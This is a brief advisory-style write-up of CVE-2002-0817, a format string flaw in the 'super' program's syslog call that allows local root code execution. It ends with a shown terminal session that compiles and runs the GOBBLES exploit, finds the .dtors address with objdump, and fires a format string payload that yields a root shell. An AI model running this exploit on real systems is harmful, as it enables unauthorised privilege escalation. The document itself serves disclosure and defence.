CVE-2002-0817

A local user can exploit this vulnerability by providing a specially crafted, long command-line argument to the `super` program. This argument contains format string specifiers that are passed to the vulnerable `syslog()` function. By carefully controlling the input, an attacker can overwrite arbitrary memory locations, potentially leading to arbitrary code execution with root privileges [ref_id=1].

The vulnerability lies within the `super` program, specifically in how it handles error messages logged via the `syslog()` function. The `error.c` file contains the relevant code, where `SysLog(error_priority, buf);` passes user-controlled buffer content directly to `syslog()` without proper sanitization [ref_id=1].

The advisory does not specify a patch or provide remediation guidance beyond upgrading to a fixed version. Therefore, the exact changes made to fix this vulnerability are not detailed in the provided information. Users are advised to consult vendor advisories for specific patching instructions or to upgrade to a secure version of the software.

$ gcc GOBBLES-own-super.c -o GOBBLES-own-super $ ./GOBBLES-own-super

Usage: ./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]

$ objdump -s -j .dtors /usr/local/bin/super

/usr/local/bin/super: file format elf32-i386

Contents of section .dtors: 8063f7c ffffffff 00000000 ........

$ ./GOBBLES-own-super -t 0x8063f7c . target @ 0x8063f80 . shellcode @ 0xbfffffb0 . username: 9 bytes super: No such super command as `xx%.49103x%29$hn%.16305x%30$hn'. sh-2.05#